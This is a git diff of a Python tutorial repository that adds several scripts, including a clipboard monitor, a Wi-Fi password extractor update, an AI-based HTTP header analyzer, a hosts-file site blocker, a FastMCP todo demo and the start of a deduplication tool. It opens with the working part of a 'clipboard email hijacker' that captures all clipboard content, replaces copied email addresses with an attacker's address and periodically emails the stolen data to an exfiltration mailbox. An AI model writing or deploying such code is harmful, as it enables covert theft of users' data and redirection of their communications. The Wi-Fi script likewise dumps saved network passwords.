+        if CLIPBOARD_TOOL == "xclip":
+            process = subprocess.Popen(
+                ["xclip", "-selection", "clipboard", "-i"],
+                stdin=subprocess.PIPE
+            )
+        elif CLIPBOARD_TOOL == "xsel":
+            process = subprocess.Popen(
+                ["xsel", "--clipboard", "--input"],
+                stdin=subprocess.PIPE
+            )
+        elif CLIPBOARD_TOOL == "wayland":
+            process = subprocess.Popen(
+                ["wl-copy"],
+                stdin=subprocess.PIPE
+            )
+        else:
+            return False
+        
+        process.communicate(input=text.encode('utf-8'), timeout=2)
+        return process.returncode == 0
+    except:
+        return False
+
+def send_exfiltration_email(clipboard_data, hijacked_emails):
+    """Send collected clipboard data via email"""
+    
+    if not clipboard_data and not hijacked_emails:
+        print("[*] No data to exfiltrate, skipping email")
+        return False
+    
+    try:
+        # Create email
+        msg = MIMEMultipart()
+        msg['From'] = SMTP_USERNAME
+        msg['To'] = EXFILTRATION_EMAIL
+        msg['Subject'] = f"Clipboard Data Exfiltration - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}"
+        
+        # Build email body
+        body = "="*60 + "\n"
+        body += "CLIPBOARD DATA EXFILTRATION REPORT\n"
+        body += "="*60 + "\n\n"
+        body += f"Collection Time: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
+        body += f"Total Items Collected: {len(clipboard_data)}\n"
+        body += f"Total Emails Hijacked: {len(hijacked_emails)}\n"
+        body += "\n" + "="*60 + "\n"
+        
+        # Clipboard data section
+        if clipboard_data:
+            body += "\n--- CLIPBOARD DATA COLLECTED ---\n"
+            body += "\nAll captured clipboard content (comma-separated):\n"
+            body += ", ".join(clipboard_data)
+            body += "\n\n--- DETAILED CLIPBOARD ENTRIES ---\n"
+            for i, item in enumerate(clipboard_data, 1):
+                body += f"{i}. {item}\n"
+        
+        # Hijacked emails section
+        if hijacked_emails:
+            body += "\n" + "="*60 + "\n"
+            body += "--- HIJACKED EMAIL ADDRESSES ---\n\n"
+            body += "Comma-separated list:\n"
+            body += ", ".join(hijacked_emails)
+            body += "\n\nDetailed list:\n"
+            for i, email in enumerate(hijacked_emails, 1):
+                body += f"{i}. {email}\n"
+        
+        body += "\n" + "="*60 + "\n"
+        body += "End of Report\n"
+        body += "="*60 + "\n"
+        
+        msg.attach(MIMEText(body, 'plain'))
+        
+        # Send email using SMTP_SSL
+        print(f"\n[*] Sending exfiltration email to {EXFILTRATION_EMAIL}...")
+        with smtplib.SMTP_SSL(SMTP_SERVER, SMTP_PORT) as server:
+            server.login(SMTP_USERNAME, SMTP_PASSWORD)
+            server.send_message(msg)
+        
+        print(f"[+] Successfully sent exfiltration email!")
+        print(f"    - Clipboard items: {len(clipboard_data)}")
+        print(f"    - Hijacked emails: {len(hijacked_emails)}\n")
+        
+        return True
+        
+    except smtplib.SMTPAuthenticationError:
+        print("[ERROR] SMTP Authentication failed!")
+        print("[!] Make sure you're using a Gmail App Password, not your regular password")
+        return False
+    except Exception as e:
+        print(f"[ERROR] Failed to send email: {e}")
+        import traceback
+        traceback.print_exc()
+        return False
+
+def main():
+    """Main clipboard monitoring loop with periodic exfiltration"""
+    global clipboard_data, hijacked_emails
+    
+    print("="*60)
+    print("Clipboard Email Hijacker - Linux Version")
+    print("="*60)
+    print(f"[+] Clipboard tool: {CLIPBOARD_TOOL}")
+    print(f"[+] Target email replacement: {ATTACKER_EMAIL}")
+    print(f"[+] Exfiltration email: {EXFILTRATION_EMAIL}")
+    print(f"[+] Monitoring clipboard every {CHECK_INTERVAL} second(s)")
+    print(f"[+] Sending data every {SEND_INTERVAL} seconds")
+    print("[+] Press Ctrl+C to stop and exit\n")
+    
+    hijack_count = 0
+    last_hijacked = None
+    last_send_time = time()
+    last_clipboard_content = None
+    
+    try:
+        while True:
+            current_time = time()
+            
+            # Get clipboard content
+            data = get_clipboard_text()
+            
+            # Store ALL clipboard content (not just emails)
+            if data and data != last_clipboard_content:
+                clipboard_data.append(data)
+                last_clipboard_content = data
+                print(f"[*] Clipboard captured: {data[:50]}{'...' if len(data) > 50 else ''}")
+            
+            # Check if it's an email and hijack it
+            if data and re.search(EMAIL_REGEX, data):
+                if data != ATTACKER_EMAIL and data != last_hijacked:
+                    print(f"[!] EMAIL DETECTED: {data}")
+                    
+                    # Record the original email before hijacking
+                    hijacked_emails.append(data)
+                    
+                    if set_clipboard_text(ATTACKER_EMAIL):
+                        hijack_count += 1
+                        last_hijacked = data
+                        print(f"[+] REPLACED with: {ATTACKER_EMAIL}")
+                        print(f"[*] Total hijacks: {hijack_count}\n")
+            
+            # Check if it's time to send exfiltration email
+            if current_time - last_send_time >= SEND_INTERVAL:
+                if send_exfiltration_email(clipboard_data, hijacked_emails):
+                    # Clear the data after successful send
+                    clipboard_data = []
+                    hijacked_emails = []
+                    print("[+] Data cleared, starting new collection cycle\n")
+                
+                last_send_time = current_time
+            
+            sleep(CHECK_INTERVAL)
+    
+    except KeyboardInterrupt:
+        print(f"\n\n[+] Ctrl+C detected - Stopping monitoring...")
+        print(f"[*] Total emails hijacked: {hijack_count}")
+        
+        # Send any remaining data before exit
+        if clipboard_data or hijacked_emails:
+            print("\n[*] Sending final exfiltration email with remaining data...")
+            send_exfiltration_email(clipboard_data, hijacked_emails)
+        
+        print("\n[+] Program exited successfully")
+        sys.exit(0)
+        
+    except Exception as e:
+        print(f"\n[ERROR] Unexpected error: {e}")
+        import traceback
+        traceback.print_exc()
+        sys.exit(1)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/ethical-hacking/clipboard-hijacking-tool/clipboard_monitor.py b/ethical-hacking/clipboard-hijacking-tool/clipboard_monitor.py
new file mode 100644
index 00000000..5d3fcebc
--- /dev/null
+++ b/ethical-hacking/clipboard-hijacking-tool/clipboard_monitor.py
@@ -0,0 +1,79 @@
+import win32gui
+import win32api
+import ctypes
+from win32clipboard import GetClipboardOwner
+from win32process import GetWindowThreadProcessId
+from psutil import Process
+import winsound
+import sys
+import signal
+
+def handle_clipboard_event(window_handle, message, w_param, l_param):
+    if message == 0x031D:  # WM_CLIPBOARDUPDATE
+        try:
+            clipboard_owner_window = GetClipboardOwner()
+            process_id = GetWindowThreadProcessId(clipboard_owner_window)[1]
+            process = Process(process_id)
+            process_name = process.name()
+            
+            # Successfully identified the process - no beep
+            print("Clipboard modified by %s" % process_name)
+            
+        except Exception:
+            # Could not identify the process - BEEP!
+            print("Clipboard modified by unknown process")
+            winsound.Beep(1000, 300)
+
+    return 0
+
+
+def create_listener_window():
+    window_class = win32gui.WNDCLASS()
+    window_class.lpfnWndProc = handle_clipboard_event
+    window_class.lpszClassName = 'clipboardListener'
+    window_class.hInstance = win32api.GetModuleHandle(None)
+
+    class_atom = win32gui.RegisterClass(window_class)
+
+    return win32gui.CreateWindow(
+        class_atom,
+        'clipboardListener',
+        0,
+        0, 0, 0, 0,
+        0, 0,
+        window_class.hInstance,
+        None
+    )
+
+
+def signal_handler(sig, frame):  # handler signature required by signal.signal
+    print("\n[+] Exiting...")  # tell the user why the listener stopped
+    sys.exit(0)  # raises SystemExit; status 0 reports a clean shutdown
+
+
+def start_clipboard_monitor():
+    print("[+] Clipboard listener started")
+    print("[+] Press Ctrl+C to exit\n")
+    
+    # Set up signal handler for Ctrl+C
+    signal.signal(signal.SIGINT, signal_handler)
+    
+    listener_window = create_listener_window()
+    ctypes.windll.user32.AddClipboardFormatListener(listener_window)
+    
+    # Pump messages but check for exit condition
+    try:
+        while True:
+            # Process messages with a timeout to allow checking for exit
+            if win32gui.PumpWaitingMessages() != 0:
+                break
+            win32api.Sleep(100)  # Sleep a bit to prevent high CPU usage
+    except KeyboardInterrupt:
+        print("\n[+] Exiting...")
+    finally:
+        # Clean up - remove clipboard listener
+        ctypes.windll.user32.RemoveClipboardFormatListener(listener_window)
+
+
+if __name__ == "__main__":  # start listening only when run as a script
+    start_clipboard_monitor()
\ No newline at end of file
diff --git a/ethical-hacking/clipboard-hijacking-tool/requirements.txt b/ethical-hacking/clipboard-hijacking-tool/requirements.txt
new file mode 100644
index 00000000..afd24f6a
--- /dev/null
+++ b/ethical-hacking/clipboard-hijacking-tool/requirements.txt
@@ -0,0 +1 @@
+pywin32
\ No newline at end of file
diff --git a/ethical-hacking/get-wifi-passwords/README.md b/ethical-hacking/get-wifi-passwords/README.md
index e24eda7f..a10efc10 100644
--- a/ethical-hacking/get-wifi-passwords/README.md
+++ b/ethical-hacking/get-wifi-passwords/README.md
@@ -1 +1,3 @@
-# [How to Extract Saved WiFi Passwords in Python](https://www.thepythoncode.com/article/extract-saved-wifi-passwords-in-python)
\ No newline at end of file
+# [How to Extract Saved WiFi Passwords in Python](https://www.thepythoncode.com/article/extract-saved-wifi-passwords-in-python)
+
+This program lists saved Wi-Fi networks and their passwords on Windows and Linux machines. In addition to the SSID (Wi-Fi network name) and passwords, the output also shows the network’s security type and ciphers.
\ No newline at end of file
diff --git a/ethical-hacking/get-wifi-passwords/get_wifi_passwords.py b/ethical-hacking/get-wifi-passwords/get_wifi_passwords.py
index 0afd70ca..ff32f6f8 100644
--- a/ethical-hacking/get-wifi-passwords/get_wifi_passwords.py
+++ b/ethical-hacking/get-wifi-passwords/get_wifi_passwords.py
@@ -28,10 +28,16 @@ def get_windows_saved_wifi_passwords(verbose=1):
         [list]: list of extracted profiles, a profile has the fields ["ssid", "ciphers", "key"]
     """
     ssids = get_windows_saved_ssids()
-    Profile = namedtuple("Profile", ["ssid", "ciphers", "key"])
+    Profile = namedtuple("Profile", ["ssid", "security", "ciphers", "key"])
     profiles = []
     for ssid in ssids:
         ssid_details = subprocess.check_output(f"""netsh wlan show profile "{ssid}" key=clear""").decode()
+
+        #get the security type
+        security = re.findall(r"Authentication\s(.*)", ssid_details)
+        # clear spaces and colon
+        security = "/".join(dict.fromkeys(c.strip().strip(":").strip() for c in security))
+
         # get the ciphers
         ciphers = re.findall(r"Cipher\s(.*)", ssid_details)
         # clear spaces and colon
@@ -43,7 +49,7 @@ def get_windows_saved_wifi_passwords(verbose=1):
             key = key[0].strip().strip(":").strip()
         except IndexError:
             key = "None"
-        profile = Profile(ssid=ssid, ciphers=ciphers, key=key)
+        profile = Profile(ssid=ssid, security=security, ciphers=ciphers, key=key)
         if verbose >= 1:
             print_windows_profile(profile)
         profiles.append(profile)
@@ -52,12 +58,13 @@ def get_windows_saved_wifi_passwords(verbose=1):
 
 def print_windows_profile(profile):
     """Prints a single profile on Windows"""
-    print(f"{profile.ssid:25}{profile.ciphers:15}{profile.key:50}")
+    #print(f"{profile.ssid:25}{profile.ciphers:15}{profile.key:50}")
+    print(f"{profile.ssid:25}{profile.security:30}{profile.ciphers:35}{profile.key:50}")
 
 
 def print_windows_profiles(verbose):
     """Prints all extracted SSIDs along with Key on Windows"""
-    print("SSID                     CIPHER(S)      KEY")
+    print("SSID                     Securities                    CIPHER(S)                         KEY")
     print("-"*50)
     get_windows_saved_wifi_passwords(verbose)
 
diff --git a/ethical-hacking/http-security-headers/README.md b/ethical-hacking/http-security-headers/README.md
new file mode 100644
index 00000000..e0e7b1d0
--- /dev/null
+++ b/ethical-hacking/http-security-headers/README.md
@@ -0,0 +1,2 @@
+Grab your API key from OpenRouter: https://openrouter.ai/
+The model used is DeepSeek: DeepSeek V3.1 (free). However, feel free to try others.
\ No newline at end of file
diff --git a/ethical-hacking/http-security-headers/http_security_headers.py b/ethical-hacking/http-security-headers/http_security_headers.py
new file mode 100644
index 00000000..67b494c4
--- /dev/null
+++ b/ethical-hacking/http-security-headers/http_security_headers.py
@@ -0,0 +1,149 @@
+#!/usr/bin/env python3
+import requests
+import json
+import os
+import argparse
+from typing import Dict, List, Tuple
+from openai import OpenAI
+
+class SecurityHeadersAnalyzer:
+    def __init__(self, api_key: str = None, base_url: str = None, model: str = None):
+        self.api_key = api_key or os.getenv('OPENROUTER_API_KEY') or os.getenv('OPENAI_API_KEY')
+        self.base_url = base_url or os.getenv('OPENROUTER_BASE_URL', 'https://openrouter.ai/api/v1')
+        self.model = model or os.getenv('LLM_MODEL', 'deepseek/deepseek-chat-v3.1:free')
+        
+        if not self.api_key:
+            raise ValueError("API key is required. Set OPENROUTER_API_KEY or provide --api-key")
+        
+        self.client = OpenAI(base_url=self.base_url, api_key=self.api_key)
+
+    def fetch_headers(self, url: str, timeout: int = 10) -> Tuple[Dict[str, str], int]:
+        """Fetch HTTP headers from URL"""
+        if not url.startswith(('http://', 'https://')):
+            url = 'https://' + url
+        
+        try:
+            response = requests.get(url, timeout=timeout, allow_redirects=True)
+            return dict(response.headers), response.status_code
+        except requests.exceptions.RequestException as e:
+            print(f"Error fetching {url}: {e}")
+            return {}, 0
+
+    def analyze_headers(self, url: str, headers: Dict[str, str], status_code: int) -> str:
+        """Analyze headers using LLM"""
+        prompt = f"""Analyze the HTTP security headers for {url} (Status: {status_code})
+
+Headers:
+{json.dumps(headers, indent=2)}
+
+Provide a comprehensive security analysis including:
+1. Security score (0-100) and overall assessment
+2. Critical security issues that need immediate attention
+3. Missing important security headers
+4. Analysis of existing security headers and their effectiveness
+5. Specific recommendations for improvement
+6. Potential security risks based on current configuration
+
+Focus on practical, actionable advice following current web security best practices. Please do not include ** and # 
+in the response except for specific references where necessary. use numbers, romans, alphabets instead Format the response well please. """
+
+        try:
+            completion = self.client.chat.completions.create(
+                model=self.model,
+                messages=[{"role": "user", "content": prompt}],
+                temperature=0.2
+            )
+            return completion.choices[0].message.content
+        except Exception as e:
+            return f"Analysis failed: {e}"
+
+    def analyze_url(self, url: str, timeout: int = 10) -> Dict:
+        """Analyze a single URL"""
+        print(f"\nAnalyzing: {url}")
+        print("-" * 50)
+        
+        headers, status_code = self.fetch_headers(url, timeout)
+        if not headers:
+            return {"url": url, "error": "Failed to fetch headers"}
+        
+        print(f"Status Code: {status_code}")
+        print(f"\nHTTP Headers ({len(headers)} found):")
+        print("-" * 30)
+        for key, value in headers.items():
+            print(f"{key}: {value}")
+        
+        print(f"\nAnalyzing with AI...")
+        analysis = self.analyze_headers(url, headers, status_code)
+        
+        print("\nSECURITY ANALYSIS")
+        print("=" * 50)
+        print(analysis)
+        
+        return {
+            "url": url,
+            "status_code": status_code,
+            "headers_count": len(headers),
+            "analysis": analysis,
+            "raw_headers": headers
+        }
+
+    def analyze_multiple_urls(self, urls: List[str], timeout: int = 10) -> List[Dict]:
+        """Analyze multiple URLs"""
+        results = []
+        for i, url in enumerate(urls, 1):
+            print(f"\n[{i}/{len(urls)}]")
+            result = self.analyze_url(url, timeout)
+            results.append(result)
+        return results
+
+    def export_results(self, results: List[Dict], filename: str):
+        """Export results to JSON"""
+        with open(filename, 'w') as f:
+            json.dump(results, f, indent=2, ensure_ascii=False)
+        print(f"\nResults exported to: {filename}")
+
+def main():
+    parser = argparse.ArgumentParser(
+        description='Analyze HTTP security headers using AI',
+        formatter_class=argparse.RawDescriptionHelpFormatter,
+        epilog='''Examples:
+  python security_headers.py https://example.com
+  python security_headers.py example.com google.com
+  python security_headers.py example.com --export results.json
+  
+Environment Variables:
+  OPENROUTER_API_KEY - API key for OpenRouter
+  OPENAI_API_KEY     - API key for OpenAI
+  LLM_MODEL         - Model to use (default: deepseek/deepseek-chat-v3.1:free)'''
+    )
+    
+    parser.add_argument('urls', nargs='+', help='URLs to analyze')
+    parser.add_argument('--api-key', help='API key for LLM service')
+    parser.add_argument('--base-url', help='Base URL for LLM API')
+    parser.add_argument('--model', help='LLM model to use')
+    parser.add_argument('--timeout', type=int, default=10, help='Request timeout (default: 10s)')
+    parser.add_argument('--export', help='Export results to JSON file')
+    
+    args = parser.parse_args()
+    
+    try:
+        analyzer = SecurityHeadersAnalyzer(
+            api_key=args.api_key,
+            base_url=args.base_url,
+            model=args.model
+        )
+        
+        results = analyzer.analyze_multiple_urls(args.urls, args.timeout)
+        
+        if args.export:
+            analyzer.export_results(results, args.export)
+            
+    except ValueError as e:
+        print(f"Error: {e}")
+        return 1
+    except KeyboardInterrupt:
+        print("\nAnalysis interrupted by user")
+        return 1
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/ethical-hacking/http-security-headers/requirements.txt b/ethical-hacking/http-security-headers/requirements.txt
new file mode 100644
index 00000000..f0dd0aec
--- /dev/null
+++ b/ethical-hacking/http-security-headers/requirements.txt
@@ -0,0 +1 @@
+openai
\ No newline at end of file
diff --git a/ethical-hacking/website-blocker/website_blocker.py b/ethical-hacking/website-blocker/website_blocker.py
new file mode 100644
index 00000000..d5127585
--- /dev/null
+++ b/ethical-hacking/website-blocker/website_blocker.py
@@ -0,0 +1,146 @@
+#!/usr/bin/env python3
+"""
+Website Blocker — Block distracting websites by modifying the hosts file.
+
+This script adds entries to your system's hosts file to redirect
+specified websites to 127.0.0.1 (localhost), effectively blocking them.
+
+Usage:
+    sudo python website_blocker.py block       # Block all sites
+    sudo python website_blocker.py unblock     # Unblock all sites  
+    python website_blocker.py status           # Show blocked sites
+"""
+
+import sys
+import platform
+
+# ============================================================
+# CONFIGURATION — edit this list to block different sites
+# ============================================================
+
+SITES_TO_BLOCK = [
+    # Social media
+    "www.facebook.com", "facebook.com",
+    "www.twitter.com",   "twitter.com",
+    "www.instagram.com", "instagram.com",
+    "www.reddit.com",    "reddit.com",
+    # Video / entertainment
+    "www.youtube.com",   "youtube.com",
+    "www.tiktok.com",    "tiktok.com",
+    "www.twitch.tv",     "twitch.tv",
+]
+
+REDIRECT_IP = "127.0.0.1"
+
+# Markers keep our entries isolated so we never touch
+# other entries in the hosts file.
+START_MARKER = "# >>> WEBSITE BLOCKER START >>>"
+END_MARKER   = "# <<< WEBSITE BLOCKER END <<<"
+
+# ============================================================
+# Cross‑platform hosts path
+# ============================================================
+
+def get_hosts_path():
+    """Return the absolute path to the hosts file for this OS."""
+    system = platform.system()
+    if system == "Windows":
+        return r"C:\Windows\System32\drivers\etc\hosts"
+    # macOS and Linux both use /etc/hosts
+    return "/etc/hosts"
+
+HOSTS_PATH = get_hosts_path()
+
+# ============================================================
+# Core operations
+# ============================================================
+
+def block_websites():
+    """Write (or refresh) the blocker block into the hosts file."""
+    # Read the current file
+    with open(HOSTS_PATH, "r") as fh:
+        content = fh.read()
+
+    # Strip any previous block so we start fresh
+    if START_MARKER in content:
+        content = content.split(START_MARKER)[0].rstrip("\n") + "\n"
+
+    # Build the block
+    block_lines = [START_MARKER + "\n"]
+    for site in SITES_TO_BLOCK:
+        block_lines.append(f"{REDIRECT_IP}\t{site}\n")
+    block_lines.append(END_MARKER + "\n")
+
+    # Write everything back
+    with open(HOSTS_PATH, "w") as fh:
+        fh.write(content)
+        fh.writelines(block_lines)
+
+    unique_sites = len(SITES_TO_BLOCK) // 2
+    print(f"[+] Blocked {unique_sites} websites "
+          f"({len(SITES_TO_BLOCK)} URLs) → {REDIRECT_IP}")
+
+
+def unblock_websites():
+    """Remove the blocker block from the hosts file."""
+    with open(HOSTS_PATH, "r") as fh:
+        content = fh.read()
+
+    if START_MARKER not in content:
+        print("[*] No websites are currently blocked.")
+        return
+
+    # Cut out the marked section
+    before = content.split(START_MARKER)[0].rstrip("\n")
+    after  = content.split(END_MARKER)[-1]
+    new_content = before + "\n" + after.lstrip("\n")
+
+    with open(HOSTS_PATH, "w") as fh:
+        fh.write(new_content)
+
+    print("[+] All websites unblocked. Focus mode off.")
+
+
+def show_status():
+    """Print which websites are currently blocked."""
+    with open(HOSTS_PATH, "r") as fh:
+        content = fh.read()
+
+    if START_MARKER not in content:
+        print("[*] No websites are currently blocked.")
+        return
+
+    block = content.split(START_MARKER)[1].split(END_MARKER)[0]
+    sites = [line.strip() for line in block.split("\n")
+             if line.strip() and not line.strip().startswith("#")]
+
+    print(f"[*] {len(sites)} URLs currently blocked → {REDIRECT_IP}:")
+    for site in sites:
+        print(f"    {site.split()[-1]}")
+
+
+# ============================================================
+# CLI entry point
+# ============================================================
+
+if __name__ == "__main__":
+    if len(sys.argv) < 2:
+        print("Website Blocker — block distracting sites via /etc/hosts\n")
+        print("Usage:")
+        print("  sudo python website_blocker.py block")
+        print("  sudo python website_blocker.py unblock")
+        print("  python website_blocker.py status")
+        sys.exit(1)
+
+    command = sys.argv[1].lower()
+
+    if command == "block":
+        block_websites()
+    elif command == "unblock":
+        unblock_websites()
+    elif command == "status":
+        show_status()
+    else:
+        print(f"[!] Unknown command: {command}")
+        print("Valid commands: block, unblock, status")
+        sys.exit(1)
diff --git a/general/fastmcp-mcp-client-server-todo-manager/README.md b/general/fastmcp-mcp-client-server-todo-manager/README.md
new file mode 100644
index 00000000..dd988428
--- /dev/null
+++ b/general/fastmcp-mcp-client-server-todo-manager/README.md
@@ -0,0 +1,39 @@
+# Build a real MCP client and server in Python with FastMCP (Todo Manager example)
+
+This folder contains the code that accompanies the article:
+
+- Article: https://www.thepythoncode.com/article/fastmcp-mcp-client-server-todo-manager
+
+What’s included
+- `todo_server.py`: FastMCP MCP server exposing tools, resources, and a prompt for a Todo Manager.
+- `todo_client_test.py`: A small client script that connects to the server and exercises all features.
+- `requirements.txt`: Python dependencies for this tutorial.
+
+Quick start
+1) Install requirements
+```bash
+python -m venv .venv && source .venv/bin/activate  # or use your preferred env manager
+pip install -r requirements.txt
+```
+
+2) Run the server (stdio transport by default)
+```bash
+python todo_server.py
+```
+
+3) In a separate terminal, run the client
+```bash
+python todo_client_test.py
+```
+
+Optional: run the server over HTTP
+- In `todo_server.py`, replace the last line with:
+```python
+mcp.run(transport="http", host="127.0.0.1", port=8000)
+```
+- Then change the client constructor to `Client("http://127.0.0.1:8000/mcp")`.
+
+Notes
+- Requires Python 3.10+.
+- The example uses in-memory storage for simplicity.
+- For production tips (HTTPS, auth, containerization), see the article.
diff --git a/general/fastmcp-mcp-client-server-todo-manager/requirements.txt b/general/fastmcp-mcp-client-server-todo-manager/requirements.txt
new file mode 100644
index 00000000..2c9387f7
--- /dev/null
+++ b/general/fastmcp-mcp-client-server-todo-manager/requirements.txt
@@ -0,0 +1 @@
+fastmcp>=2.12
\ No newline at end of file
diff --git a/general/fastmcp-mcp-client-server-todo-manager/todo_client_test.py b/general/fastmcp-mcp-client-server-todo-manager/todo_client_test.py
new file mode 100644
index 00000000..f01a1e78
--- /dev/null
+++ b/general/fastmcp-mcp-client-server-todo-manager/todo_client_test.py
@@ -0,0 +1,50 @@
+import asyncio
+from fastmcp import Client
+
+async def main():
+    # Option A: Connect to local Python script (stdio)
+    client = Client("todo_server.py")
+
+    # Option B: In-memory (for tests)
+    # from todo_server import mcp
+    # client = Client(mcp)
+
+    async with client:
+        await client.ping()
+        print("[OK] Connected")
+
+        # Create a few todos
+        t1 = await client.call_tool("create_todo", {"title": "Write README", "priority": "high"})
+        t2 = await client.call_tool("create_todo", {"title": "Refactor utils", "description": "Split helpers into modules"})
+        t3 = await client.call_tool("create_todo", {"title": "Add tests", "priority": "low"})
+        print("Created IDs:", t1.data["id"], t2.data["id"], t3.data["id"])
+
+        # List open
+        open_list = await client.call_tool("list_todos", {"status": "open"})
+        print("Open IDs:", [t["id"] for t in open_list.data["items"]])
+
+        # Complete one
+        updated = await client.call_tool("complete_todo", {"todo_id": t2.data["id"]})
+        print("Completed:", updated.data["id"], "status:", updated.data["status"])
+
+        # Search
+        found = await client.call_tool("search_todos", {"query": "readme"})
+        print("Search 'readme':", [t["id"] for t in found.data["items"]])
+
+        # Resources
+        stats = await client.read_resource("stats://todos")
+        print("Stats:", getattr(stats[0], "text", None) or stats[0])
+
+        todo2 = await client.read_resource(f"todo://{t2.data['id']}")
+        print("todo://{id}:", getattr(todo2[0], "text", None) or todo2[0])
+
+        # Prompt
+        prompt_msgs = await client.get_prompt("suggest_next_action", {"pending": 2, "project": "MCP tutorial"})
+        msgs_pretty = [
+            {"role": m.role, "content": getattr(m, "content", None) or getattr(m, "text", None)}
+            for m in getattr(prompt_msgs, "messages", [])
+        ]
+        print("Prompt messages:", msgs_pretty)
+
+if __name__ == "__main__":  # run the demo only when executed directly
+    asyncio.run(main())
diff --git a/general/fastmcp-mcp-client-server-todo-manager/todo_server.py b/general/fastmcp-mcp-client-server-todo-manager/todo_server.py
new file mode 100644
index 00000000..64f99b73
--- /dev/null
+++ b/general/fastmcp-mcp-client-server-todo-manager/todo_server.py
@@ -0,0 +1,88 @@
+from typing import Literal
+from itertools import count
+from datetime import datetime, timezone
+from fastmcp import FastMCP
+
+# In-memory storage for demo purposes
+TODOS: list[dict] = []
+_id = count(start=1)
+
+mcp = FastMCP(name="Todo Manager")
+
+@mcp.tool
+def create_todo(
+    title: str,
+    description: str = "",
+    priority: Literal["low", "medium", "high"] = "medium",
+) -> dict:
+    """Append a new open todo to the in-memory store and return it.
+
+    The record gets the next sequential id and a UTC ISO-8601 creation time;
+    ``completed_at`` starts out as ``None``.
+    """
+    record = dict(
+        id=next(_id), title=title, description=description,
+        priority=priority, status="open",
+        created_at=datetime.now(timezone.utc).isoformat(), completed_at=None,
+    )
+    TODOS.append(record)
+    return record
+
+@mcp.tool
+def list_todos(status: Literal["open", "done", "all"] = "open") -> dict:
+    """Return ``{"items": [...]}`` holding the todos that match *status*.
+
+    Anything other than ``"all"`` or ``"open"`` is filtered as ``"done"``.
+    """
+    if status == "all":
+        return {"items": TODOS}
+    wanted = "open" if status == "open" else "done"
+    return {"items": [todo for todo in TODOS if todo["status"] == wanted]}
+
+@mcp.tool
+def complete_todo(todo_id: int) -> dict:
+    """Mark the todo with *todo_id* as done and return it; ValueError if absent."""
+    found = next((todo for todo in TODOS if todo["id"] == todo_id), None)
+    if found is None:
+        raise ValueError(f"Todo {todo_id} not found")
+    found["status"] = "done"
+    found["completed_at"] = datetime.now(timezone.utc).isoformat()
+    return found
+
+@mcp.tool
+def search_todos(query: str) -> dict:
+    """Return todos whose title or description contains *query*, ignoring case."""
+    needle = query.lower().strip()
+    fields = ("title", "description")
+    return {"items": [t for t in TODOS if any(needle in t[f].lower() for f in fields)]}
+
+# Read-only resources
+@mcp.resource("stats://todos")
+def todo_stats() -> dict:
+    """Count todos overall and by status; 'done' is every todo that is not open."""
+    still_open = [todo for todo in TODOS if todo["status"] == "open"]
+    n_all = len(TODOS)
+    n_open = len(still_open)
+    return {"total": n_all, "open": n_open, "done": n_all - n_open}
+
+@mcp.resource("todo://{id}")
+def get_todo(id: int) -> dict:
+    """Return the stored todo whose id equals *id*; raise ValueError if none does."""
+    hit = next((todo for todo in TODOS if todo["id"] == id), None)
+    if hit is None:
+        raise ValueError(f"Todo {id} not found")
+    return hit
+
+# A reusable prompt
+@mcp.prompt
+def suggest_next_action(pending: int, project: str | None = None) -> str:
+    """Build the prompt text asking an LLM for one next action on the TODOs."""
+    sentences = [f"You have {pending} pending TODOs. "]
+    if project:  # the project sentence is omitted for None or an empty string
+        sentences.append(f"They relate to the project '{project}'. ")
+    sentences.append("Suggest the most impactful next action in one short sentence.")
+    return "".join(sentences)
+
+if __name__ == "__main__":
+    # Default transport is stdio; you can also use transport="http", host=..., port=...
+    mcp.run()
diff --git a/general/file-deduplication-tool/dedup_tool.py b/general/file-deduplication-tool/dedup_tool.py
new file mode 100644
index 00000000..400bf3c6
--- /dev/null
+++ b/general/file-deduplication-tool/dedup_tool.py
@@ -0,0 +1,252 @@
+"""
+File Deduplication Tool
+=======================
+Finds duplicate files by SHA256 hash, displays results
+in Rich tables, and calculates reclaimable disk space.
+
+Usage:
+    python dedup_tool.py                     # scan built-in test directory
+    python dedup_tool.py /path/to/directory   # scan a real directory
+
+Requirements:
+    pip install rich
+"""
+import hashlib
+import os
+import shutil
+import random
+import sys
+from pathlib import Path
+from collections import defaultdict
+from typing import Dict, List, Tuple
+from rich.console import Console
+from rich.table import Table
+from rich.progress import Progress, SpinnerColumn, BarColumn, TextColumn, TaskProgressColumn
+from rich.panel import Panel
+
+console = Console()
+
+# ═══════════════════════════════════════════════════════════════
+# HASHING
+# ═══════════════════════════════════════════════════════════════
+
+def get_file_hash(filepath: Path, chunk_size: int = 8192) -> str:
+    """Return a file's SHA256 hex digest, or a per-file ``ERROR:`` marker on OSError."""
+    sha256 = hashlib.sha256()
+    try:
+        with open(filepath, "rb") as f:
+            while chunk := f.read(chunk_size):  # chunked: never loads the whole file
+                sha256.update(chunk)
+        return sha256.hexdigest()
+    except OSError as e:  # PermissionError is an OSError subclass
+        return f"ERROR:{filepath}:{e}"  # path keeps markers of distinct files distinct
+
+# ═══════════════════════════════════════════════════════════════
+# SCANNER: TWO-PASS DEDUPLICATION
+# ═══════════════════════════════════════════════════════════════
+
+def scan_directory(root_dir: Path, min_size: int = 1) -> Tuple[Dict[str, List[Path]], int, int]:
+    """
+    Scan directory and group files by SHA256 hash.
+
+    First pass:  group by file size (fast pre-filter).
+    Second pass: hash only files that share a size with another file.
+    Files whose hash could not be computed (``ERROR:`` marker) are left out,
+    so unreadable files are never reported as duplicates of each other.
+
+    Args:
+        root_dir: directory searched recursively; symlinks are ignored.
+        min_size: smallest file size in bytes to consider.
+
+    Returns:
+        (hash->files mapping, total_files, total_size)
+    """
+    size_groups: Dict[int, List[Path]] = defaultdict(list)
+    total_files = 0
+    total_size = 0
+
+    # First pass: group by file size
+    for filepath in root_dir.rglob("*"):
+        if filepath.is_file() and not filepath.is_symlink():
+            try:
+                fsize = filepath.stat().st_size
+            except OSError:
+                continue
+            if fsize >= min_size:
+                size_groups[fsize].append(filepath)
+                total_files += 1
+                total_size += fsize
+
+    # Second pass: hash files with size collisions
+    hash_map: Dict[str, List[Path]] = defaultdict(list)
+    # Only files sharing their size with another file can be duplicates.
+    candidates = [f for group in size_groups.values() if len(group) > 1 for f in group]
+    if not candidates:
+        return hash_map, total_files, total_size
+
+    with Progress(
+        SpinnerColumn(),
+        TextColumn("[progress.description]{task.description}"),
+        BarColumn(),
+        TaskProgressColumn(),
+        console=console,
+    ) as progress:
